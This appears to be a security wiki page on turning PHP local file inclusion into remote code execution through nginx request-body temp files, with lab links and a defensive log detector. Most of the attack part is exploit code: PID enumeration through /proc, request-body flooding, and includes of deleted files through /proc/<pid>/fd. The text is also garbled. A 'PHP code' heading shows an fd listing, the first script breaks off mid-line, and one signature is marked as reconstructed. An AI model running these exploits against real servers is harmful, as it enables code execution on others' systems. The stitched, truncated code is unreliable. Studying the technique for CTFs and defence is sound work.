# LFI2RCE via Nginx temp files

## Vulnerable configuration

Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/

* PHP code:

```
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```

Note: you cannot directly include `/proc/34/fd/15` in this example because PHP's include function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)`, which does not exist in the filesystem. This minor restriction can be bypassed with some indirection such as `/proc/self/fd/34/../../../34/fd/15`, which will finally execute the content of the deleted file `/var/lib/nginx/body/0000001368`.

## Full Exploit

```python
#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r = requests.get(URL, params={ 'file': '/proc/cpuinfo' })
cpus = r.text.count('processor')

r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid_max' })
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' })
    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')
        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.get(URL, data=' //'
```

The second exploit script is structured as follows:

* Sending the payload: in an endless loop, POST a large request body to Nginx under the file path `/bla`:

  ```python
  try:
      requests_session.post(SERVER + "/?action=read&file=/bla",
                            data=(payload + ("a" * (body_size - len(payload)))))
  except:
      pass
  ```

* Sending the payload from multiple processes: use all CPUs to send the payload as the request body to Nginx.
* Generating a random path prefix: the path is built from a random number of ProcFS components and looks like `/proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root`:

  ```python
  def generate_random_path_prefix(nginx_pids):  # signature reconstructed from the description above
      path = ""
      component_num = random.randint(0, 10)
      for _ in range(component_num):
          pid = random.choice(nginx_pids)
          if random.randint(0, 1) == 0:
              path += f"/proc/{pid}/cwd"
          else:
              path += f"/proc/{pid}/root"
      return path
  ```

* Reading a file: a request that reads a file given an Nginx PID, an FD and the list of Nginx PIDs. Nginx FDs between 10 and 45 are scanned in a loop; since files and sockets keep being closed, it is very common for the request-body FD to be opened within this range.
* Reading files from multiple processes.
* Main program:

  ```python
  if __name__ == "__main__":
      print('[DEBUG] Creating requests session')
      requests_session = create_requests_session()
      print('[DEBUG] Getting Nginx pids')
      nginx_pids = get_nginx_pids(requests_session)
      print(f'[DEBUG] Nginx pids: {nginx_pids}')
      print('[DEBUG] Starting payload sending')
      send_payload_multiprocess(requests_session)
      print('[DEBUG] Starting fd readers')
      read_file_multiprocess(requests_session, nginx_pids)
  ```
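As an added defensive example (not part of either exploit or the original write-up), the following parses constructed nginx access-log lines and flags the request patterns the technique above produces: worker-PID discovery through `/proc/<pid>/cmdline`, `/proc/<pid>/cwd` and `/proc/<pid>/root` path hops, and includes of `/proc/<pid>/fd/<n>` or `/var/lib/nginx/body/`. The log lines, the `file` parameter name and the enumeration threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx "combined" access-log lines (not from a real server): a worker-PID scan
# via /proc/<pid>/cmdline, then includes through /proc/<pid>/fd, then one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Dec/2021:23:50:01 +0000] "GET /?file=/proc/cpuinfo HTTP/1.1" 200 812 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:50:01 +0000] "GET /?file=/proc/33/cmdline HTTP/1.1" 200 21 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:50:01 +0000] "GET /?file=/proc/34/cmdline HTTP/1.1" 200 21 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:50:02 +0000] "GET /?file=/proc/35/cmdline HTTP/1.1" 200 21 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:58:10 +0000] "GET /?file=/proc/self/fd/34/../../../34/fd/15 HTTP/1.1" 200 64 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:58:11 +0000] "GET /?action=read&file=%2Fproc%2F34%2Fcwd%2Fproc%2F35%2Froot%2Fproc%2F34%2Ffd%2F12 HTTP/1.1" 200 64 "-" "-"
192.168.1.9 - - [25/Dec/2021:23:58:12 +0000] "GET /?file=pages/about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
FD_INCLUDE_RE = re.compile(r'/proc/(?:self|\d+)/fd/\d+|/var/lib/nginx/body/')  # include of a worker fd / body temp file
PROCFS_HOP_RE = re.compile(r'/proc/\d+/(?:cwd|root)')                            # /proc/<pid>/cwd or /root used as a hop
PID_ENUM_RE = re.compile(r'^/proc/(\d+)/cmdline$')                               # worker-PID discovery

def file_params(target):
    """All values of the assumed 'file' query parameter, decoded a second time to catch double encoding."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [unquote(v) for v in qs.get('file', [])]

def analyse(log_text, enum_threshold=3):
    """Return (client_ip, alert_type, detail) tuples; cmdline reads are aggregated per client."""
    alerts = []
    cmdline_pids = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip = m['ip']
        for path in file_params(m['target']):
            pid_match = PID_ENUM_RE.match(path)
            if FD_INCLUDE_RE.search(path):
                alerts.append((ip, 'procfs-fd-include', path))
            elif PROCFS_HOP_RE.search(path):
                alerts.append((ip, 'procfs-cwd-root-hop', path))
            elif pid_match:
                cmdline_pids[ip].add(int(pid_match.group(1)))
            elif path.startswith('/proc/'):
                alerts.append((ip, 'procfs-read', path))
    for ip, pids in cmdline_pids.items():
        if len(pids) >= enum_threshold:
            alerts.append((ip, 'pid-enumeration', f'{len(pids)} distinct /proc/<pid>/cmdline reads'))
    return alerts
```

Running `analyse(SAMPLE_LOG)` yields one `procfs-read`, two `procfs-fd-include` and one `pid-enumeration` alert for 10.0.0.5 and nothing for the benign client.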

## Labs

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)

## References

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
